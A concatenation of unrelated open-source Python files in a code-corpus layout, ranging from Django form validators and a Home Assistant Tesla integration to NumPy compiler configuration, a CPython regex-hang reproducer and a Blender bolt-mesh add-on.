_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
[DocumentListAclEntry])
def DocumentListAclFeedFromString(xml_string):
"""Converts an XML string into a DocumentListAclFeed object.
Args:
xml_string: string The XML describing a DocumentList feed.
Returns:
A DocumentListFeed object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListAclFeed, xml_string)
|
davidzchen/tensorflow | refs/heads/master | tensorflow/python/estimator/canned/head.py | 40 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""head python module.
Importing from tensorflow.python.estimator is unsupported
and will soon break!
"""
# pylint: disable=unused-import,g-bad-import-order,g-import-not-at-top,wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_estimator.python.estimator.canned import head
# Include attrs that start with single underscore.
_HAS_DYNAMIC_ATTRIBUTES = True
head.__all__ = [s for s in dir(head) if not s.startswith('__')]
from tensorflow_estimator.python.estimator.canned.head import *
|
potatolondon/django-nonrel-1-4 | refs/heads/master | django/contrib/localflavor/ar/forms.py | 87 | # -*- coding: utf-8 -*-
"""
AR-specific Form helpers.
"""
from __future__ import absolute_import
from django.contrib.localflavor.ar.ar_provinces import PROVINCE_CHOICES
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import RegexField, CharField, Select
from django.utils.translation import ugettext_lazy as _
class ARProvinceSelect(Select):
"""
A Select widget that uses a list of Argentinean provinces/autonomous cities
as its choices.
"""
def __init__(self, attrs=None):
super(ARProvinceSelect, self).__init__(attrs, choices=PROVINCE_CHOICES)
class ARPostalCodeField(RegexField):
"""
A field that accepts a 'classic' NNNN Postal Code or a CPA.
See http://www.correoargentino.com.ar/consulta_cpa/home.php
"""
default_error_messages = {
'invalid': _("Enter a postal code in the format NNNN or ANNNNAAA."),
}
def __init__(self, max_length=8, min_length=4, *args, **kwargs):
super(ARPostalCodeField, self).__init__(r'^\d{4}$|^[A-HJ-NP-Za-hj-np-z]\d{4}\D{3}$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
value = super(ARPostalCodeField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if len(value) not in (4, 8):
raise ValidationError(self.error_messages['invalid'])
if len(value) == 8:
return u'%s%s%s' % (value[0].upper(), value[1:5], value[5:].upper())
return value
class ARDNIField(CharField):
"""
A field that validates 'Documento Nacional de Identidad' (DNI) numbers.
"""
default_error_messages = {
'invalid': _("This field requires only numbers."),
'max_digits': _("This field requires 7 or 8 digits."),
}
def __init__(self, max_length=10, min_length=7, *args, **kwargs):
super(ARDNIField, self).__init__(max_length, min_length, *args,
**kwargs)
def clean(self, value):
"""
Value can be a string either in the [X]X.XXX.XXX or [X]XXXXXXX formats.
"""
value = super(ARDNIField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if not value.isdigit():
value = value.replace('.', '')
if not value.isdigit():
raise ValidationError(self.error_messages['invalid'])
if len(value) not in (7, 8):
raise ValidationError(self.error_messages['max_digits'])
return value
class ARCUITField(RegexField):
"""
This field validates a CUIT (Código Único de Identificación Tributaria). A
CUIT is of the form XX-XXXXXXXX-V. The last digit is a check digit.
"""
default_error_messages = {
'invalid': _('Enter a valid CUIT in XX-XXXXXXXX-X or XXXXXXXXXXXX format.'),
'checksum': _("Invalid CUIT."),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(ARCUITField, self).__init__(r'^\d{2}-?\d{8}-?\d$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
"""
Value can be either a string in the format XX-XXXXXXXX-X or an
11-digit number.
"""
value = super(ARCUITField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value, cd = self._canon(value)
if self._calc_cd(value) != cd:
raise ValidationError(self.error_messages['checksum'])
return self._format(value, cd)
def _canon(self, cuit):
cuit = cuit.replace('-', '')
return cuit[:-1], cuit[-1]
def _calc_cd(self, cuit):
mults = (5, 4, 3, 2, 7, 6, 5, 4, 3, 2)
tmp = sum([m * int(cuit[idx]) for idx, m in enumerate(mults)])
return str(11 - tmp % 11)
def _format(self, cuit, check_digit=None):
if check_digit == None:
check_digit = cuit[-1]
cuit = cuit[:-1]
return u'%s-%s-%s' % (cuit[:2], cuit[2:], check_digit)
|
nkgilley/home-assistant | refs/heads/dev | homeassistant/components/tesla/__init__.py | 2 | """Support for Tesla cars."""
import asyncio
from collections import defaultdict
import logging
from teslajsonpy import Controller as TeslaAPI, TeslaException
import voluptuous as vol
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import (
ATTR_BATTERY_CHARGING,
ATTR_BATTERY_LEVEL,
CONF_ACCESS_TOKEN,
CONF_PASSWORD,
CONF_SCAN_INTERVAL,
CONF_TOKEN,
CONF_USERNAME,
)
from homeassistant.core import callback
from homeassistant.helpers import aiohttp_client, config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import slugify
from .config_flow import (
CannotConnect,
InvalidAuth,
configured_instances,
validate_input,
)
from .const import (
CONF_WAKE_ON_START,
DATA_LISTENER,
DEFAULT_SCAN_INTERVAL,
DEFAULT_WAKE_ON_START,
DOMAIN,
ICONS,
MIN_SCAN_INTERVAL,
TESLA_COMPONENTS,
)
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(
CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL
): vol.All(cv.positive_int, vol.Clamp(min=MIN_SCAN_INTERVAL)),
}
)
},
extra=vol.ALLOW_EXTRA,
)
@callback
def _async_save_tokens(hass, config_entry, access_token, refresh_token):
hass.config_entries.async_update_entry(
config_entry,
data={
**config_entry.data,
CONF_ACCESS_TOKEN: access_token,
CONF_TOKEN: refresh_token,
},
)
async def async_setup(hass, base_config):
"""Set up of Tesla component."""
def _update_entry(email, data=None, options=None):
data = data or {}
options = options or {
CONF_SCAN_INTERVAL: DEFAULT_SCAN_INTERVAL,
CONF_WAKE_ON_START: DEFAULT_WAKE_ON_START,
}
for entry in hass.config_entries.async_entries(DOMAIN):
if email != entry.title:
continue
hass.config_entries.async_update_entry(entry, data=data, options=options)
config = base_config.get(DOMAIN)
if not config:
return True
email = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
scan_interval = config[CONF_SCAN_INTERVAL]
if email in configured_instances(hass):
try:
info = await validate_input(hass, config)
except (CannotConnect, InvalidAuth):
return False
_update_entry(
email,
data={
CONF_ACCESS_TOKEN: info[CONF_ACCESS_TOKEN],
CONF_TOKEN: info[CONF_TOKEN],
},
options={CONF_SCAN_INTERVAL: scan_interval},
)
else:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data={CONF_USERNAME: email, CONF_PASSWORD: password},
)
)
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][email] = {CONF_SCAN_INTERVAL: scan_interval}
return True
async def async_setup_entry(hass, config_entry):
"""Set up Tesla as config entry."""
hass.data.setdefault(DOMAIN, {})
config = config_entry.data
websession = aiohttp_client.async_get_clientsession(hass)
email = config_entry.title
if email in hass.data[DOMAIN] and CONF_SCAN_INTERVAL in hass.data[DOMAIN][email]:
scan_interval = hass.data[DOMAIN][email][CONF_SCAN_INTERVAL]
hass.config_entries.async_update_entry(
config_entry, options={CONF_SCAN_INTERVAL: scan_interval}
)
hass.data[DOMAIN].pop(email)
try:
controller = TeslaAPI(
websession,
refresh_token=config[CONF_TOKEN],
access_token=config[CONF_ACCESS_TOKEN],
update_interval=config_entry.options.get(
CONF_SCAN_INTERVAL, DEFAULT_SCAN_INTERVAL
),
)
(refresh_token, access_token) = await controller.connect(
wake_if_asleep=config_entry.options.get(
CONF_WAKE_ON_START, DEFAULT_WAKE_ON_START
)
)
except TeslaException as ex:
_LOGGER.error("Unable to communicate with Tesla API: %s", ex.message)
return False
_async_save_tokens(hass, config_entry, access_token, refresh_token)
entry_data = hass.data[DOMAIN][config_entry.entry_id] = {
"controller": controller,
"devices": defaultdict(list),
DATA_LISTENER: [config_entry.add_update_listener(update_listener)],
}
_LOGGER.debug("Connected to the Tesla API.")
all_devices = entry_data["controller"].get_homeassistant_components()
if not all_devices:
return False
for device in all_devices:
entry_data["devices"][device.hass_type].append(device)
for component in TESLA_COMPONENTS:
_LOGGER.debug("Loading %s", component)
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, component)
)
return True
async def async_unload_entry(hass, config_entry) -> bool:
"""Unload a config entry."""
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(config_entry, component)
for component in TESLA_COMPONENTS
]
)
for listener in hass.data[DOMAIN][config_entry.entry_id][DATA_LISTENER]:
listener()
username = config_entry.title
hass.data[DOMAIN].pop(config_entry.entry_id)
_LOGGER.debug("Unloaded entry for %s", username)
return True
async def update_listener(hass, config_entry):
"""Update when config_entry options update."""
controller = hass.data[DOMAIN][config_entry.entry_id]["controller"]
old_update_interval = controller.update_interval
controller.update_interval = config_entry.options.get(CONF_SCAN_INTERVAL)
_LOGGER.debug(
"Changing scan_interval from %s to %s",
old_update_interval,
controller.update_interval,
)
class TeslaDevice(Entity):
"""Representation of a Tesla device."""
def __init__(self, tesla_device, controller, config_entry):
"""Initialise the Tesla device."""
self.tesla_device = tesla_device
self.controller = controller
self.config_entry = config_entry
self._name = self.tesla_device.name
self.tesla_id = slugify(self.tesla_device.uniq_name)
self._attributes = {}
self._icon = ICONS.get(self.tesla_device.type)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def unique_id(self) -> str:
"""Return a unique ID."""
return self.tesla_id
@property
def icon(self):
"""Return the icon of the sensor."""
return self._icon
@property
def should_poll(self):
"""Return the polling state."""
return self.tesla_device.should_poll
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attr = self._attributes
if self.tesla_device.has_battery():
attr[ATTR_BATTERY_LEVEL] = self.tesla_device.battery_level()
attr[ATTR_BATTERY_CHARGING] = self.tesla_device.battery_charging()
return attr
@property
def device_info(self):
"""Return the device_info of the device."""
return {
"identifiers": {(DOMAIN, self.tesla_device.id())},
"name": self.tesla_device.car_name(),
"manufacturer": "Tesla",
"model": self.tesla_device.car_type,
"sw_version": self.tesla_device.car_version,
}
async def async_added_to_hass(self):
"""Register state update callback."""
async def async_will_remove_from_hass(self):
"""Prepare for unload."""
async def async_update(self):
"""Update the state of the device."""
if self.controller.is_token_refreshed():
(refresh_token, access_token) = self.controller.get_tokens()
_async_save_tokens(
self.hass, self.config_entry, access_token, refresh_token
)
_LOGGER.debug("Saving new tokens in config_entry")
await self.tesla_device.async_update()
|
mdanielwork/intellij-community | refs/heads/master | python/testData/quickFixes/PyAsyncCallQuickFixTest/addYieldFromBeforeCall_after.py | 18 | import asyncio
@asyncio.coroutine
def bar():
yield from asyncio.sleep(2)
return "hey"
@asyncio.coroutine
def foo():
yield from bar()
return True
|
ahaldane/numpy | refs/heads/master | numpy/distutils/fcompiler/ibm.py | 8 | from __future__ import division, absolute_import, print_function
import os
import re
import sys
import subprocess
from numpy.distutils.fcompiler import FCompiler
from numpy.distutils.exec_command import find_executable
from numpy.distutils.misc_util import make_temp_file
from distutils import log
compilers = ['IBMFCompiler']
class IBMFCompiler(FCompiler):
compiler_type = 'ibm'
description = 'IBM XL Fortran Compiler'
version_pattern = r'(xlf\(1\)\s*|)IBM XL Fortran ((Advanced Edition |)Version |Enterprise Edition V|for AIX, V)(?P<version>[^\s*]*)'
#IBM XL Fortran Enterprise Edition V10.1 for AIX \nVersion: 10.01.0000.0004
executables = {
'version_cmd' : ["<F77>", "-qversion"],
'compiler_f77' : ["xlf"],
'compiler_fix' : ["xlf90", "-qfixed"],
'compiler_f90' : ["xlf90"],
'linker_so' : ["xlf95"],
'archiver' : ["ar", "-cr"],
'ranlib' : ["ranlib"]
}
def get_version(self,*args,**kwds):
version = FCompiler.get_version(self,*args,**kwds)
if version is None and sys.platform.startswith('aix'):
# use lslpp to find out xlf version
lslpp = find_executable('lslpp')
xlf = find_executable('xlf')
if os.path.exists(xlf) and os.path.exists(lslpp):
try:
o = subprocess.check_output([lslpp, '-Lc', 'xlfcmp'])
except (OSError, subprocess.CalledProcessError):
pass
else:
m = re.search(r'xlfcmp:(?P<version>\d+([.]\d+)+)', o)
if m: version = m.group('version')
xlf_dir = '/etc/opt/ibmcmp/xlf'
if version is None and os.path.isdir(xlf_dir):
# linux:
# If the output of xlf does not contain version info
# (that's the case with xlf 8.1, for instance) then
# let's try another method:
l = sorted(os.listdir(xlf_dir))
l.reverse()
l = [d for d in l if os.path.isfile(os.path.join(xlf_dir, d, 'xlf.cfg'))]
if l:
from distutils.version import LooseVersion
self.version = version = LooseVersion(l[0])
return version
def get_flags(self):
return ['-qextname']
def get_flags_debug(self):
return ['-g']
def get_flags_linker_so(self):
opt = []
if sys.platform=='darwin':
opt.append('-Wl,-bundle,-flat_namespace,-undefined,suppress')
else:
opt.append('-bshared')
version = self.get_version(ok_status=[0, 40])
if version is not None:
if sys.platform.startswith('aix'):
xlf_cfg = '/etc/xlf.cfg'
else:
xlf_cfg = '/etc/opt/ibmcmp/xlf/%s/xlf.cfg' % version
fo, new_cfg = make_temp_file(suffix='_xlf.cfg')
log.info('Creating '+new_cfg)
with open(xlf_cfg, 'r') as fi:
crt1_match = re.compile(r'\s*crt\s*[=]\s*(?P<path>.*)/crt1.o').match
for line in fi:
m = crt1_match(line)
if m:
fo.write('crt = %s/bundle1.o\n' % (m.group('path')))
else:
fo.write(line)
fo.close()
opt.append('-F'+new_cfg)
return opt
def get_flags_opt(self):
return ['-O3']
if __name__ == '__main__':
from numpy.distutils import customized_fcompiler
log.set_verbosity(2)
print(customized_fcompiler(compiler='ibm').get_version())
|
mattvenn/Arduino | refs/heads/esp8266 | arduino-core/src/processing/app/i18n/python/requests/packages/urllib3/packages/ordered_dict.py | 1093 | # Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
|
xuxiao19910803/edx-platform | refs/heads/master | lms/djangoapps/django_comment_client/base/urls.py | 102 | from django.conf.urls.defaults import url, patterns
urlpatterns = patterns(
'django_comment_client.base.views',
url(r'upload$', 'upload', name='upload'),
url(r'threads/(?P<thread_id>[\w\-]+)/update$', 'update_thread', name='update_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/reply$', 'create_comment', name='create_comment'),
url(r'threads/(?P<thread_id>[\w\-]+)/delete', 'delete_thread', name='delete_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/upvote$', 'vote_for_thread', {'value': 'up'}, name='upvote_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/downvote$', 'vote_for_thread', {'value': 'down'}, name='downvote_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/flagAbuse$', 'flag_abuse_for_thread', name='flag_abuse_for_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unFlagAbuse$', 'un_flag_abuse_for_thread', name='un_flag_abuse_for_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unvote$', 'undo_vote_for_thread', name='undo_vote_for_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/pin$', 'pin_thread', name='pin_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unpin$', 'un_pin_thread', name='un_pin_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/follow$', 'follow_thread', name='follow_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unfollow$', 'unfollow_thread', name='unfollow_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/close$', 'openclose_thread', name='openclose_thread'),
url(r'comments/(?P<comment_id>[\w\-]+)/update$', 'update_comment', name='update_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/endorse$', 'endorse_comment', name='endorse_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/reply$', 'create_sub_comment', name='create_sub_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/delete$', 'delete_comment', name='delete_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/upvote$', 'vote_for_comment', {'value': 'up'}, name='upvote_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/downvote$', 'vote_for_comment', {'value': 'down'}, name='downvote_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/unvote$', 'undo_vote_for_comment', name='undo_vote_for_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/flagAbuse$', 'flag_abuse_for_comment', name='flag_abuse_for_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/unFlagAbuse$', 'un_flag_abuse_for_comment', name='un_flag_abuse_for_comment'),
url(r'^(?P<commentable_id>[\w\-.]+)/threads/create$', 'create_thread', name='create_thread'),
url(r'^(?P<commentable_id>[\w\-.]+)/follow$', 'follow_commentable', name='follow_commentable'),
url(r'^(?P<commentable_id>[\w\-.]+)/unfollow$', 'unfollow_commentable', name='unfollow_commentable'),
url(r'users$', 'users', name='users'),
)
|
BT-ojossen/odoo | refs/heads/8.0 | addons/pos_discount/__openerp__.py | 312 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Point of Sale Discounts',
'version': '1.0',
'category': 'Point of Sale',
'sequence': 6,
'summary': 'Simple Discounts in the Point of Sale ',
'description': """
=======================
This module allows the cashier to quickly give a percentage
sale discount to a customer.
""",
'author': 'OpenERP SA',
'depends': ['point_of_sale'],
'data': [
'views/views.xml',
'views/templates.xml'
],
'installable': True,
'website': 'https://www.odoo.com/page/point-of-sale',
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
kevinmel2000/sl4a | refs/heads/master | python/src/Lib/test/crashers/infinite_loop_re.py | 346 |
# This was taken from http://python.org/sf/1541697
# It's not technically a crasher. It may not even truly be infinite,
# however, I haven't waited a long time to see the result. It takes
# 100% of CPU while running this and should be fixed.
import re
starttag = re.compile(r'<[a-zA-Z][-_.:a-zA-Z0-9]*\s*('
r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~@]'
r'[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*(?=[\s>/<])))?'
r')*\s*/?\s*(?=[<>])')
if __name__ == '__main__':
foo = '<table cellspacing="0" cellpadding="0" style="border-collapse'
starttag.match(foo)
|
sagark123/coala | refs/heads/master | coalib/results/result_actions/PrintAspectAction.py | 17 | from coalib.results.Result import Result
from coalib.results.result_actions.ResultAction import ResultAction
from coala_utils.decorators import enforce_signature
class PrintAspectAction(ResultAction):
@staticmethod
@enforce_signature
def is_applicable(result: Result, original_file_dict, file_diff_dict):
if result.aspect is None:
return 'There is no aspect associated with the result.'
return True
def apply(self, result, original_file_dict, file_diff_dict):
"""
Print Aspect Information
"""
print(type(result.aspect).__qualname__ + '\n' +
type(result.aspect).docs.definition)
return file_diff_dict
|
smira/aptly | refs/heads/master | system/t05_snapshot/__init__.py | 3 | """
Testing snapshot management
"""
|
ThinkboxSoftware/Deadline | refs/heads/master | Custom/events/SetJobLimit/SetJobLimit.py | 1 | ###############################################################
# Imports
###############################################################
from Deadline.Events import *
from Deadline.Scripting import *
###############################################################
# This is the function called by Deadline to get an instance of the Draft event listener.
###############################################################
def GetDeadlineEventListener():
return SetJobLimitListener()
def CleanupDeadlineEventListener(eventListener):
eventListener.Cleanup()
###############################################################
# The event listener class.
###############################################################
class SetJobLimitListener (DeadlineEventListener):
def __init__(self):
self.OnJobSubmittedCallback += self.OnJobSubmitted
def Cleanup(self):
del self.OnJobSubmittedCallback
def OnJobSubmitted(self, job):
limitNames = self.GetConfigEntry("JobLimits").split(',')
for limitName in job.JobLimitGroups:
if limitName.lower() not in limitNames:
limitNames.append(limitName)
job.SetJobLimitGroups(limitNames)
RepositoryUtils.SaveJob(job)
|
PLyczkowski/Sticky-Keymap | refs/heads/master | 2.74/scripts/addons/add_mesh_BoltFactory/Boltfactory.py | 3 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from bpy.props import *
from add_mesh_BoltFactory.createMesh import *
from add_mesh_BoltFactory.preset_utils import *
##------------------------------------------------------------
# calculates the matrix for the new object
# depending on user pref
def align_matrix(context):
loc = mathutils.Matrix.Translation(context.scene.cursor_location)
obj_align = context.user_preferences.edit.object_align
if (context.space_data.type == 'VIEW_3D'
and obj_align == 'VIEW'):
rot = context.space_data.region_3d.view_matrix.to_3x3().inverted().to_4x4()
else:
rot = mathutils.Matrix()
align_matrix = loc * rot
return align_matrix
class add_mesh_bolt(bpy.types.Operator):
""""""
bl_idname = "mesh.bolt_add"
bl_label = "Add Bolt"
bl_options = {'REGISTER', 'UNDO', 'PRESET'}
bl_description = "adds many types of Bolts"
align_matrix = mathutils.Matrix()
MAX_INPUT_NUMBER = 50
# edit - Whether to add or update.
edit = BoolProperty(name="",
description="",
default=False,
options={'HIDDEN'})
#Model Types
Model_Type_List = [('bf_Model_Bolt','BOLT','Bolt Model'),
('bf_Model_Nut','NUT','Nut Model')]
bf_Model_Type = EnumProperty( attr='bf_Model_Type',
name='Model',
description='Choose the type off model you would like',
items = Model_Type_List, default = 'bf_Model_Bolt')
#Head Types
Model_Type_List = [('bf_Head_Hex','HEX','Hex Head'),
('bf_Head_Cap','CAP','Cap Head'),
('bf_Head_Dome','DOME','Dome Head'),
('bf_Head_Pan','PAN','Pan Head'),
('bf_Head_CounterSink','COUNTER SINK','Counter Sink Head')]
bf_Head_Type = EnumProperty( attr='bf_Head_Type',
name='Head',
description='Choose the type off Head you would like',
items = Model_Type_List, default = 'bf_Head_Hex')
#Bit Types
Bit_Type_List = [('bf_Bit_None','NONE','No Bit Type'),
('bf_Bit_Allen','ALLEN','Allen Bit Type'),
('bf_Bit_Philips','PHILLIPS','Phillips Bit Type')]
bf_Bit_Type = EnumProperty( attr='bf_Bit_Type',
name='Bit Type',
description='Choose the type of bit to you would like',
items = Bit_Type_List, default = 'bf_Bit_None')
#Nut Types
Nut_Type_List = [('bf_Nut_Hex','HEX','Hex Nut'),
('bf_Nut_Lock','LOCK','Lock Nut')]
bf_Nut_Type = EnumProperty( attr='bf_Nut_Type',
name='Nut Type',
description='Choose the type of nut you would like',
items = Nut_Type_List, default = 'bf_Nut_Hex')
#Shank Types
bf_Shank_Length = FloatProperty(attr='bf_Shank_Length',
name='Shank Length', default = 0,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Length of the unthreaded shank')
